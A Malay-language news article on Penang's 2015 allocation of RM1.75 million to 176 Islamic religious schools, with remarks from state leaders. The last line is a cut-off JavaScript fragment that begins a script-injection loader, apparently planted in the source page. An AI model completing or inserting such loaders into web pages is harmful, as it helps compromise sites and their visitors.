BAYAN BARU – Tanggungjawab pada aspek pembangunan serta keperluan pendidikan negara adalah di bawah bidang kuasa Kerajaan Pusat, justeru, adalah wajar Pusat turut membantu menyuntik bantuan dana kepada sekolah-sekolah agama rakyat (SAR).
Kenyataan tersebut dinyatakan Ketua Menteri, Y.A.B. Tuan Lim Guan Eng pada Majlis Penyerahan Bantuan SAR Negeri Pulau Pinang 2015 bertempat di Masjid Umar Al-Khattab, Bayan Baru di sini baru-baru ini.
Guan Eng berkata, atas keprihatinan Kerajaan Negeri, buat julung kalinya untuk peruntukan tahun ini (2015), turut diperuntukan sejumlah dana kepada sekolah-sekolah pondok di seluruh negeri ini.
“Bermula 2015 ini, kita (Kerajaan Negeri) telah menambah bilangan sekolah (yang menerima sumbangan) dengan memasukkan sekolah pondok di dalam senarai penerima bagi mengiktiraf sumbangannya (sekolah pondok) dalam persada pendidikan agama Islam negeri.
“Secara keseluruhan, sumbangan ini adalah bantuan yang disalurkan Kerajaan Negeri secara tahunan sejak 2009 dan tahun ini, kita (Kerajaan Negeri) tambah sekolah-sekolah pondok di dalam senarai sebagai usaha berterusan untuk memartabatkan agama Islam dan mengiktiraf sumbangan pihak berkaitan pada aspek pembangunan ummah di sini,” ujarnya yang juga merangkap Exco Hal Ehwal Tanah & Pembangunan Tanah, Penerangan, Kebudayaan dan Kesenian, Warisan dan Hal Ehwal Bukan Islam.
Hadir sama, Timbalan Ketua Menteri I, Dato’ Mohd. Rashid Hasnon, Dato’ Abdul Malik Abul Kassim (Exco Hal Ehwal Agama, Perdagangan Dalam Negeri dan Hal Ehwal Pengguna) dan Dato’ Abdul Halim Hussain (Timbalan Yang Di-Pertua Majlis Agama Islam Negeri Pulau Pinang, MAINPP).
Turut berucap pada majlis sama, Ahli Parlimen Permatang Pauh, Dato’ Seri Dr. Wan Azizah Wan Ismail dan Mohamad Sabu (bekas Ahli Lembaga Pengarah Perbadanan Bekalan Air Pulau Pinang, PBAPP).
Pada majlis tersebut, Sekolah Menengah Agama Rakyat menerima peruntukan sebanyak RM435,500, diikuti Sekolah Rendah Agama Rakyat (RM321,100), Sekolah Agama Bantuan Kerajaan (RM279,500), Maahad Tahfiz (RM178,200), Sekolah Agama Rakyat (Kafa Intergrasi) (RM418,800), Tadika Islam (RM26,900) dan Pondok (RM90,000).
Keseluruhan sumbangan adalah berjumlah RM1.75 juta membabitkan 176 sekolah.
Peruntukan yang disumbangkan adalah meliputi aspek pengurusan, keceriaan sekolah, alat bantuan mengajar dan saguhati kepada guru-guru besar, guru-guru dan kakitangan sekolah.
Dalam pada itu, mengulas lanjut, Abdul Malik memberitahu, Kerajaan Negeri bertekad meningkatkan mutu pendidikan agama Islam melalui pelbagai perancangan.
“InsyaAllah dengan sokongan berterusan yang diberikan, ia diharap dapat membentuk generasi pewaris yang berilmu dan bertaqwa dalam memartabatkan syiar Islam di negeri ini,” ujar beliau yang juga Ahli Dewan Undangan Negeri (ADUN) Batu Maung.
Sebelum ini, pada Aidilfitri lalu, Kerajaan Negeri turut mengumumkan pemberian bonus raya sebanyak RM200 hingga RM300 seorang kepada 1,975 guru KAFA, Sekolah Menengah Agama Rakyat, Sekolah Rendah Agama Rakyat, Guru Tahfiz dan Pondok serta Guru Tadika Islam dengan jumlah keseluruhan sumbangan bernilai RM1,146,200.
var d=document;var s=d.createElement(‘script’);